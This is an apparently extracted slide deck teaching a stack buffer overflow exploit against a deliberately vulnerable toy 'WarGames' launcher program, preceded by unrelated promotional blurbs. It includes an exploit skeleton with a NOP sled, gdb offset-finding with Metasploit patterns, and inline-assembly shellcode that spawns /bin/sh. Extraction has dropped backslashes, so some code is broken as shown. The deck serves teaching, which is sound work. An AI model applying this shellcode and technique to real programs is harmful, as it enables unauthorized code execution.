Even though at surface level ‘java.lang.OutOfMemoryError’ appears as one single error; underlyingly there are 9 types of OutOfMemoryError. Each type of OutOfMemoryError has different causes, diagnosis approaches and solutions. This session equips you with the knowledge, tools, and techniques needed to troubleshoot and conquer OutOfMemoryError in all its forms, ensuring smoother, more efficient Java applications.
Cyaniclab : Software Development Agency Portfolio.pdfCyanic lab
CyanicLab, an offshore custom software development company based in Sweden,India, Finland, is your go-to partner for startup development and innovative web design solutions. Our expert team specializes in crafting cutting-edge software tailored to meet the unique needs of startups and established enterprises alike. From conceptualization to execution, we offer comprehensive services including web and mobile app development, UI/UX design, and ongoing software maintenance. Ready to elevate your business? Contact CyanicLab today and let us propel your vision to success with our top-notch IT solutions.
11. 11
$ hello$ clang -o launch launch.c
launch.c:19:3: warning: implicit declaration of
function 'gets' is invalid in C99
[-Wimplicit-function-declaration]
gets(response);
^
1 warning generated.
/tmp/launch-0d1b0f.o: In function
`authenticate_and_launch':
launch.c:(.text+0x5e): warning: the `gets' function is
dangerous and should not be used.
CWE-242: Use of Inherently Dangerous Function @pati_gallardo
26. 26
$ hello
CMakeLists.txt
# Wargames C++
# -------------------------
add_executable(launch_cpp src/launch.cpp)
Start from scratch with C++ @pati_gallardo
48. Shellcode - code that gives you shell
int execve(const char *filename,
char *const argv[],
char *const envp[]);
Target Process
Vulnerable
Program
Target Process
/bin/sh
Shellcode
48
@pati_gallardo
51. 100 char[5]: “ret” address 95
99 char[4]: No-op
98 char[3]: No-op
97 char[2]: No-op
96 char[1]: Shellcode
95 char[0]: Shellcode
Stack
grows
toward
lower
addresses
Instructions
also go
toward
higher
addresses
51
Write direction vs Stack growing direction
@pati_gallardo
52. 52
stack_overflow_exploit.c
@pati_gallardoint main(void) {
char shellcode[] = "";
size_t shellcode_size = (sizeof shellcode) - 1;
int offset = 0; // We need to find the return addr offset
int padded_bytes = offset - shellcode_size;
{
fwrite(shellcode, 1, shellcode_size, stdout);
}
{
char pad[] = "x90"; // No-ops
for (int i = 0; i < padded_bytes; i++)
fwrite(pad, 1, 1, stdout);
}
{
// We need to find the address of the buffer
char addr[] = "";
fwrite(addr, 1, 6, stdout);
}
putchar('0');
}
Basic
structure of
the exploit
code
53. 53
stack_overflow_exploit.c
@pati_gallardoint main(void) {
char shellcode[] = "";
size_t shellcode_size = (sizeof shellcode) - 1;
int offset = 0; // We need to find the return addr offset
int padded_bytes = offset - shellcode_size;
{
fwrite(shellcode, 1, shellcode_size, stdout);
}
{
char pad[] = "x90"; // No-ops
for (int i = 0; i < padded_bytes; i++)
fwrite(pad, 1, 1, stdout);
}
{
// We need to find the address of the buffer
char addr[] = "";
fwrite(addr, 1, 6, stdout);
}
putchar('0');
}
What we need
to know
Offset of
return address
from buffer on
the stack
Address of buffer
in memory
54. 54
launch_bigger.cpp
@pati_gallardovoid launch_missiles(int n) {
printf("Launching %d missilesn", n);
}
void authenticate_and_launch(void) {
int n_missiles = 2;
bool allowaccess = false;
char response[110];
printf("%pn", &response);
printf("Secret: ");
std::cin >> response;
if (strcmp(response, "Joshua") == 0)
allowaccess = true;
if (allowaccess) {
puts("Access granted");
launch_missiles(n_missiles);
}
if (!allowaccess)
puts("Access denied");
}
int main(void) {
puts("WarGames MissileLauncher v0.1");
authenticate_and_launch();
puts("Operation complete");
}
Lets make
some
changes to
make it
easier
Bigger buffer and get
the address
56. Metasploit pattern_create and pattern_offset
Used to find the offset of the return pointer from the start of the buffer
Metasploit pattern_create
Creates a string of un-repeated character sequences
Metasploit pattern_offset
Gives the offset in the character sequence of this section
@pati_gallardo
56
57. 57
@pati_gallardo$ pattern_create -l 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac
1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
e3Ae4Ae5Ae6Ae7Ae8Ae9
$ clang++ -z execstack -fno-stack-protector -o launch_bigger
launch_bigger.cpp
$ gdb -q ./launch_bigger
(gdb) br *authenticate_and_launch+205
Breakpoint 1 at 0x4008dd
(gdb) r
Starting program: ./launch_bigger
WarGames MissileLauncher v0.1
0x7fffffffdc90
Secret:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac
1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
e3Ae4Ae5Ae6Ae7Ae8Ae9
Access granted
Launching 1698771301 missiles
Breakpoint 1, 0x00000000004008dd in authenticate_and_launch() ()
(gdb) x/1xg $sp
0x7fffffffdd18: 0x3765413665413565
(gdb) q
$ pattern_offset -q 3765413665413565
[*] Exact match at offset 136
Find the
offset of the
return
address
Offset of return
address from buffer
on the stack
Address of buffer
in memory
68. New Idea!
Try to close STDIN and reopen tty first
@pati_gallardo
68
69. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
69
@pati_gallardo
71. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
71
@pati_gallardo
72. 72
$ hellowargames$ clang -save-temps -Os -static -fno-stack-protector -o
shellcode shellcode.c
wargames$ ./shellcode
$
wargames$ ldd shellcode
not a dynamic executable
Build it statically, with no canary @pati_gallardo
73. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
73
@pati_gallardo
77. 77
$ hello
shellcode_asm.c
// --------------------------------------------------------
// close
// --------------------------------------------------------
"xor %rdi, %rdint" // Zero out rdi - without using 0
"xor %rax, %raxnt" // Zero out rax - without using 0
"mov $0x3, %alnt" // Write the syscall number (3) to al
"syscallnt" // Do the syscall
%rax # System call %rdi
0x3 3 sys_close unsigned int fd
@pati_gallardo
79. 79
$ hello
shellcode_asm.c
// --------------------------------------------------------
// open
// --------------------------------------------------------
"xor %rax, %raxnt" // Zero out rax - without using 0
"push %raxnt" // Push a string terminator
"movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx:
// /dev/tty = 2f 64 65 76 2f 74 74 79
"push %rbxnt" // Push rbx on the stack
"mov %rsp, %rsint" // Put a pointer to the string in rsi
"xor %rdx, %rdxnt" // Zero out rdx - without using 0
"xor %rdi, %rdint" // Zero out rdi - without using 0
"xor %r10, %r10nt" // Zero out r10 - without using 0
"mov $0x101, %eaxnt" // Write the syscall number (257)
"syscallnt" // Do the syscall
%rax # System call %rdi %rsi %rdx %r10
0x101 257 sys_openat int dfd const char * filename int flags int mode
@pati_gallardo
81. 81
$ hello
shellcode_asm.c
// --------------------------------------------------------
// execve
// --------------------------------------------------------
"xor %rdx, %rdxnt" // Zero out rdx - without using 0
"xor %rax, %raxnt" // Zero out rax - without using 0
"push %raxnt" // Push a string terminator
"movabs $0x68732f2f6e69622f, %rbxnt" // Put the string in rbx:
// /bin//sh = 2f 62 69 6e 2f 2f 73 68
"push %rbxnt" // Push rbx on the stack
"mov %rsp, %rdint" // Put a pointer to the string in rdi
"push %rdxnt" // Push a null to terminate the array
"push %rdint" // Push the pointer to the string
"mov %rsp, %rsint" // Put a pointer to argv in rsi
"mov $0x3b, %alnt" // Write the syscall number 59 to al
"syscallnt" // Do the syscall
%rax # System call %rdi %rsi %rdx
0x3b 59 sys_execve const char *
filename
const char *
const argv[]
const char *
const envp[]
@pati_gallardo
82. 82
$ hellowargames$ clang -o shellcode_asm shellcode_asm.c
wargames$ ./shellcode_asm
$
Compile and test the assembly @pati_gallardo
✔
84. 84
$ hello
shellcode_asm.c
// --------------------------------------------------------
// open
// --------------------------------------------------------
"xor %rax, %raxnt" // Zero out rax - without using 0
"push %raxnt" // Push a string terminator
"movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx:
// /dev/tty = 2f 64 65 76 2f 74 74 79
"push %rbxnt" // Push rbx on the stack
"mov %rsp, %rsint" // Put a pointer to the string in rsi
"xor %rdx, %rdxnt" // Zero out rdx - without using 0
"xor %rdi, %rdint" // Zero out rdi - without using 0
"xor %r10, %r10nt" // Zero out r10 - without using 0
"mov $0x101, %eaxnt" // Write syscall number 257 to eax
"syscallnt" // Do the syscall
@pati_gallardo
%rax # System call %rdi %rsi %rdx %r10
0x101 257 sys_openat int dfd const char * filename int flags int mode
85. 85
$ hello
shellcode_asm.c
"mov $0xFF, %alnt" // Write syscall number 255 to al
"inc %raxnt"
"inc %raxnt"
//"mov $0x101, %eaxnt" // Write syscall number 257 to eax
%rax # System call %rdi %rsi %rdx %r10
0x101 257 sys_openat int dfd const char * filename int flags int mode
@pati_gallardo
Write 255 and
inc it twice
87. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
87
@pati_gallardo
90. 90
$ hello$ clang -z execstack -o shellcode_test shellcode_test.c
$ ./shellcode_test
len:77 bytes
$
Compile and test the assembly @pati_gallardo
✔
91. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
91
@pati_gallardo
92. 92
$ hellowargames$ clang -o shellcode_exploit
shellcode_exploit.c
wargames$ ./shellcode_exploit > file
wargames$ gdb -q ./launch_bigger
(gdb) r < file
Starting program: ./launch_bigger < file
WarGames MissileLauncher v0.1
0x7fffffffdc90
Secret: Access denied
process 29337 is executing new program: /bin/dash
$
Use the exploit in gdb @pati_gallardo
✔
104. 104
LINUX SYSTEM CALL TABLE FOR X86 64
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
Hex to decimal converter
https://www.rapidtables.com/convert/number/hex-to-decimal.html
https://www.asciitohex.com
Weird machines, exploitability, and provable unexploitability - Thomas Dullien/Halvar
Flake
https://vimeo.com/252868605
Resources @pati_gallardo